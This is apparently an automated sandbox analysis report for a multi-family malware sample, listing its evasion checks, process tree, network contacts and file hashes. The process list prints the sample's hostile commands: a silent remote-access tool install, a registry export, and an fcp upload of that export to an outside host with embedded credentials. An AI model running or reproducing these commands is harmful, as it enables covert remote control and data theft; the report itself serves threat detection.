| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\System\123.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\System\id.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\123.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\id.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Software\Wine | C:\Program Files (x86)\System\rutserv.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4216 set thread context of 4820 | N/A | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 2160 set thread context of 824 | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\fcp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rfusclient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\id.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\System\rutserv.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000_Classes\Local Settings | C:\Program Files (x86)\System\id.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\System\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
"C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"
C:\Program Files (x86)\System\123.exe
"C:\Program Files (x86)\System\123.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files (x86)\System"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
"C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /firewall
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
"C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
C:\Program Files (x86)\System\rutserv.exe
rutserv.exe /start
C:\Program Files (x86)\System\rutserv.exe
"C:\Program Files (x86)\System\rutserv.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe"
C:\Windows\SysWOW64\regedit.exe
regedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
C:\Program Files (x86)\System\id.exe
"C:\Program Files (x86)\System\id.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"
C:\Program Files (x86)\System\rfusclient.exe
"C:\Program Files (x86)\System\rfusclient.exe" /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "
C:\Users\Admin\AppData\Local\Temp\fcp.exe
fcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ivgenyroman22.hhos.ru | udp |
| US | 8.8.8.8:53 | rmansys.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | hunter13.beget.tech | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| GB | 2.16.153.209:443 | www.bing.com | tcp |
| GB | 2.16.153.209:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | x95244d7.beget.tech | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
Files
C:\Program Files (x86)\System\install.vbs
| MD5 | 316840cd95d80c8c879e0812a39e8151 |
| SHA1 | 6b1b804219c028c18311dd5c273b0cc3730c8044 |
| SHA256 | 4631bc6d3ff7b81435f2451251dce0de99e0d72a9a9f7f024d001e11663cda34 |
| SHA512 | 2295924c9a98fe19432df62503ddd18afb2c0af16168a8c276be4c3cf08ce1d98f1441e0a2a9d0ad68c4f3d843de00084a2303cd268791f25ce25a12d9b90036 |
C:\Program Files (x86)\System\test.vbs
| MD5 | 7673f4b5eeccb819272231a4ea32754d |
| SHA1 | 6b1270c4eee7083932833ff9809eae34d50f5b51 |
| SHA256 | 95d605965a9f5b1a7e668156bdb0a6ba4b90a98c6337763eb4acd3bee80ea005 |
| SHA512 | 75f7505f167947ef0cd413c84dc587692450c3db5c03cde95a4712478791ff49afde135f31331e2c138913c728148c34860b7d2424db981625f299762ec8352e |
C:\Program Files (x86)\System\install.bat
| MD5 | cf76cadc2887b23aab4f1f2330968548 |
| SHA1 | f8f9495ff2e52e0a2dd218a56f5ec8b723f030a9 |
| SHA256 | d8e903d6fc11b4c05e3999d0c21fdcce6a4136e36846b0d79bb05a9cea33c2ef |
| SHA512 | 05ce5498dc762a5987ac3070b6da321e9cedced6f67fbd1929e3a6abf951b31331537e45ab64d4838204abc25f21c86d729fa2ff59b05db9aa661681937bc4b7 |
C:\Program Files (x86)\System\123.exe
| MD5 | 3b084c7f7c666af58971760174c8f32b |
| SHA1 | b9a21429c6d35abf31eae7235dd3152beaf270fb |
| SHA256 | 3bd176991ba3ae028d32f049636fb6db808b182c8551465479583e93d864be96 |
| SHA512 | d19ee5d530475996959efa6b07bbf941e281fa310bcb9be3863f3af38c8f938d86648fd9f776032a3170dd59a0162a54a5ea28698e65ceb683e41732d21b880c |
C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
| MD5 | bc1b34ecfd1bf476402de205363f6372 |
| SHA1 | 2e97b088b30784c022ae556033d03b4c37b22573 |
| SHA256 | e282df4525b8e9a4ed45f48a708059c94a95709f6e4e9fc502a694047ae818a1 |
| SHA512 | 6510705430305656c90f07e46138226cdefaaa2f7699833e010e0cd65ebaefb1dab8406efe573c90b61179f79fc5a80e5e2a06976c534b64918ff94d197cc9b1 |
C:\Program Files (x86)\System\regedit.reg
| MD5 | fd06d4b501d310100f720d34ce0f7f2a |
| SHA1 | 4a0fedfda6a84c4e1ac6130a837a136947a82dd1 |
| SHA256 | 27997b89ef17f13a84c26cc3a3f7b4b1c6fc782f7257de05fcb204819897d8a3 |
| SHA512 | 9c6e0f09b490ee6b39f8ecd8df1058c5986295148c513a52cdc67da098ee72120db1c7ebc3ca864c7c3dd7ffb196bc2b5289ae06806db2e888dfa5788bf5ed91 |
C:\Program Files (x86)\System\rutserv.exe
| MD5 | b097e79d33b826d728c3bcf635d0c382 |
| SHA1 | dc98020d4feec4dd72754f728a8505f27329561e |
| SHA256 | ba3d97e0051836aad5b6002ce7b00f120bc1b57efbc74ff042f80cd2ba59e96f |
| SHA512 | 0cb3e0db0d07c70eb320707f920bb6ddd09407ab33278498383805275df7bc9e6127049d2336bc6a8eef74e7b171af2f73eff8663f27f304cb8046301da71a64 |
C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
| MD5 | 12789da76cc8737b715ffc82dc4be837 |
| SHA1 | c42ce86a036cf61c781731f4baf59b1deafaee3a |
| SHA256 | f34e1e970161c9b7a8a57e164fbd227265cc4d15d2a4b0bdb130f0c1f1bd8235 |
| SHA512 | bdcc89d7bad9899403d4396bb309ca2650de44caf3a35e1062a435077d415a5f103485a7c48bb2809673cff31ff5cd612e85a5f1fe491e7a14a2952ebcb8cf76 |
C:\Users\Admin\Desktop\Key\Key.txt
| MD5 | 7fa85ee66ad3c37306e01a041e48adff |
| SHA1 | a4a56aae1b0979bf72d32df5ed0cdfb33326c7cb |
| SHA256 | 7646355a353d254d4763f35d8859b87a2fb8e9508c7f3f60049fb97e79bc61a0 |
| SHA512 | fce7d75319a4102974d052176d0265bfdeceedca7c2cd35fc34dff9222d3bf49160182a35d1e3f9773a6b38e2c0d47b068dee6e3ec9ea6a769383d654a284802 |
C:\Users\Admin\AppData\Local\Temp\{a8aw6353}.txt
| MD5 | ee463e048e56b687d02521cd12788e2c |
| SHA1 | ee26598f8e8643df84711960e66a20ecbc6321b8 |
| SHA256 | 3a07b3003758a79a574aa73032076567870389751f2a959537257070da3a10d8 |
| SHA512 | 42b395bf6bd97da800385b9296b63a4b0edd7b3b50dc92f19e61a89235a42d37d204359b57d506e6b25ab95f16625cce035ed3b55ef2d54951c82332498dab0f |
C:\Users\Admin\AppData\Roaming\ptst1Y7Q9P7V7Q1Y7Q9P7V7Q\General\cards.log
| MD5 | 833406139ec477aabb10628c3b5e75c7 |
| SHA1 | b303b77b367d401e9900bec03e33a2cfb846b7e4 |
| SHA256 | f8d5bf0b8b53fc90f9224504e0a488360c79929eb1c9ee3436d73daa611f17c0 |
| SHA512 | 76f1bae11ab39ea64b2a1daea8aefb56d42e79f8076c31fac27c5d535c28c6cec0dc6ec1dfe9302de5c77706965860ca92fdfb1e915e3a2e9292aec7ef887bd4 |
C:\Program Files (x86)\System\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\Program Files (x86)\System\rfusclient.exe
| MD5 | e96a511519df1055c9b564646a752b2d |
| SHA1 | e75b47954faf9ddd643b23110deca10164f571a0 |
| SHA256 | 3527e45b4ceec9f6526b5ba17d865395e1326f1ede774b0d6487a2146218613a |
| SHA512 | f5b99203d083935aeb4ba2ff1490d4d854afdb5c6ab294b239b8992866cbb5747298531f9e3e8353d64c3d248b0faf128c3f7e79249a30462c3991fbcdd76fc6 |
C:\Program Files (x86)\System\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wVJxOQKKa.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\Program Files (x86)\System\id.exe
| MD5 | ba67693705f46b37b4f7d427d874d2bb |
| SHA1 | 502546afcab6bf7595d98cded71007ca60c340da |
| SHA256 | f49ee07aedaaaf52c7d4153fa37a13e8e38d80d08d05144deb28820096e62862 |
| SHA512 | 2258342982d36c52a3a27079ab39190f1fdbb7c9c6d336175d5eda70deecf74db3862662409f77c42c5e23e3989e00b66fb91c6e56622b0712ca85c17e163fea |
C:\Users\Admin\AppData\Local\Temp\id.vbs
| MD5 | 21cce90e924d3151a3c041382737cd32 |
| SHA1 | a5714a783cba4d307e243557ad58848e5c18626c |
| SHA256 | 4439fcafd565dfcf294b02cff6170b9a5754171bc2224c55da387a4907e6e9ce |
| SHA512 | 0c33cdb8edfdb2c48590252d9d9670df29d2d860113c9c2f1f998c9a075a23050277a6bfde38025fc89a937f71a27c6383525b5437ba40a7ae2419b32406a478 |
C:\Users\Admin\AppData\Local\Temp\id.bat
| MD5 | 2a9efc9fb8e8aa423aab3b20c46e04c7 |
| SHA1 | 313b324233c048b14e83228a4fa2efc0454b2002 |
| SHA256 | 708ccc3654ced3ad1ebc917d0ae48ba3635464de9b71b05441e2e68526b32f8d |
| SHA512 | 334103136d264a4bf34172a6021582b16856b0e4bcceb958a72a62e92854832fd8620b988922c3b8eb6ae376df84ba4e654cc858ee96eb860ff88089a90ef41b |
C:\Users\Admin\AppData\Local\Temp\fcp.exe
| MD5 | d86fd26b2340cead820b2a905c177c63 |
| SHA1 | 313334f1d8e1a8a9c7473dead0a839c3f9855b86 |
| SHA256 | 6ece2458ddfc2bc9be6d14d1c377b2a52bf502f3757ba8024de383d85899e21b |
| SHA512 | b3dc478779d0e2a93e8fcac0e0a34e3737c8a08b0479203c73fda8f3e3345618d06485a070f17cc6d880d07c3436af4b4ba8df29dc184b0717f3a2753cbb6413 |
C:\Users\Admin\AppData\Local\Temp\pthreadGC.dll
| MD5 | 2d6a905cbe6766adf6da9d4f5a461571 |
| SHA1 | 4700349f065e96c40eb5f50aff554bf5b2eb2c21 |
| SHA256 | d47dc7d06a2873c65758568a16aee0349d87de35d8d6e7c4249f1276e81f14fa |
| SHA512 | 84e79aa2cf1d7d1d31224572f193ce5527504fb58ef79aa5e4fb672188b9dae4a5ebb4e1ba3a7d2958a0a43095023ed9ba2d36604570575fdd594d9b42786848 |